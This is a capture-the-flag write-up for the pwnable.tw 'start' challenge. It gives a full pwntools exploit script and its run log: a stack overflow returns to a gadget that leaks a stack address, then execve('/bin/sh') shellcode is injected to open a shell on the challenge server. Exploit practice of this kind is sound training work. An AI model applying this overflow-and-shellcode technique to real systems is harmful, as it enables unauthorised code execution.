pwnable.tw: start

# exploit.py

from pwn import *

# pwntools repository
# https://github.com/Gallopsled/pwntools

# pwntools documents, reference
# http://docs.pwntools.com/en/stable/index.html
# https://qiita.com/8ayac/items/12a3523394080e56ad5a

def send_payload(payload):
    """Log *payload* (as a repr, so raw bytes stay readable) and write it to the tube ``r``.

    ``r`` is the module-level remote/process tube opened further down.
    """
    shown = repr(payload)
    log.info("Send payload = %s" % shown)
    r.send(payload)

def sendline_payload(payload):
    """Log *payload* and write it to the tube ``r`` via ``sendline`` (line-terminated).

    Same logging format as :func:`send_payload`; not called anywhere in this script,
    kept as the line-oriented counterpart.
    """
    shown = repr(payload)
    log.info("Send payload = %s" % shown)
    r.sendline(payload)

# Target binary and the remote endpoint; `r` is bound to one or the other below.
binary = './start'
host = 'chall.pwnable.tw'
port = 10000

# Parsed ELF of the local copy; ROP(elf) later searches it for gadgets.
elf = ELF(binary)
# NOTE(review): the checksec.sh comment below reports "NX enabled", while the
# pwntools run recorded at the end of this page prints "NX: NX disabled".
# The second payload executes shellcode from the stack, so the latter is the
# one consistent with the exploit working -- confirm which tool is right.

# 32-bit x86 Linux target (matches the `file` output quoted below); pack() and
# unpack() below rely on the context word size set here.
context.arch = 'i386'
context.os = 'linux'
# Hexdump everything sent and received (the [DEBUG] lines in the transcript).
context.log_level = 'debug'

# file start
# start: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, not stripped

# checksec.sh --file start
# RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
# No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   start

# Any extra command-line argument (e.g. `python exploit.py r`, as in the
# transcript below) selects the remote service; with no argument the local
# binary is spawned instead.
REMOTE = len(sys.argv) >= 2
r = remote(host, port) if REMOTE else process(binary)

# linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
# http://shell-storm.org/shellcode/files/shellcode-752.php
# Raw bytes, appended unchanged to the second payload below. The length is
# what makes the transcript's byte count add up: 20 (pad) + 4 (return
# address) + 21 = 0x2d bytes sent.
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

# Gadget
# rp --file=start --unique
# 0x08048087: mov ecx, esp ; mov dl, 0x14 ; mov bl, 0x01 ; mov al, 0x04 ; int 0x80 ;  (1 found)

# gef patt c 32
# [+] Generating a pattern of 32 bytes
# aaaabaaacaaadaaaeaaafaaagaaahaaa

# $eip   : 0x61616166 ("faaa"?)

# gef patt o faaa
# [+] Searching 'faaa'
# [+] Found at offset 17 (little-endian search) likely
# [+] Found at offset 20 (big-endian search)

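# Stage 1: leak a stack address.
# The first payload overruns the buffer by 20 bytes (the offset found with the
# gef pattern above) and returns into the gadget at 0x08048087, which performs
# write(1, esp, 0x14): the program echoes 20 bytes of its own stack back.
print(r.recvuntil(':'))

rop = ROP(elf)

payload = 'A' * 20
# write(1, esp, 20)
rop.raw(0x08048087)

print(rop.dump())
payload += rop.chain()

send_payload(payload)
# recvn() blocks until exactly 4 bytes have arrived; the previous recv(4) could
# return a short read, which would make unpack() raise on a non-4-byte value.
# The remaining 16 leaked bytes stay buffered and appear to be what interactive
# mode dumps at the end of the transcript.
stack_addr = r.recvn(4)
log.info('Stack addr : %x' % unpack(stack_addr))

# Stage 2: return into the shellcode placed on the stack.
# The leaked dword serves as a stack reference; the return address is set 20
# bytes past it, where the shellcode that follows the return address in this
# payload lands (offset kept from the original script, not re-derived here).
# This relies on the stack being executable ("NX disabled" in the transcript).
payload = 'A' * 20
payload += pack(unpack(stack_addr) + 20)
payload += shellcode

send_payload(payload)

r.interactive()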
python exploit.py r
[*] '/home/vagrant/host-share/pwnabletw/Start/start'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to chall.pwnable.tw on port 10000: Done
[DEBUG] Received 0x14 bytes:
    "Let's start the CTF:"
Let's start the CTF:
[*] Loaded cached gadgets for './start'
0x0000:        0x8048087
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08'
[DEBUG] Sent 0x18 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    00000010  41 41 41 41  87 80 04 08                            │AAAA│····││
    00000018
[DEBUG] Received 0x14 bytes:
    00000000  70 0a 89 ff  01 00 00 00  34 0f 89 ff  00 00 00 00  │p···│····│4···│····│
    00000010  46 0f 89 ff                                         │F···││
    00000014
[*] Stack addr : ff890a70
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x84\n\x89\xff1\xc9\xf7\xe1Qh//shh/bin\x89\xe3\xb0\x0b\xcd\x80'
[DEBUG] Sent 0x2d bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    00000010  41 41 41 41  84 0a 89 ff  31 c9 f7 e1  51 68 2f 2f  │AAAA│····│1···│Qh//│
    00000020  73 68 68 2f  62 69 6e 89  e3 b0 0b cd  80           │shh/│bin·│····│·│
    0000002d
[*] Switching to interactive mode
\x00\x00\x004\x0f\x89\xff\x00\x00\x00\x00F\x0f\x89\xff$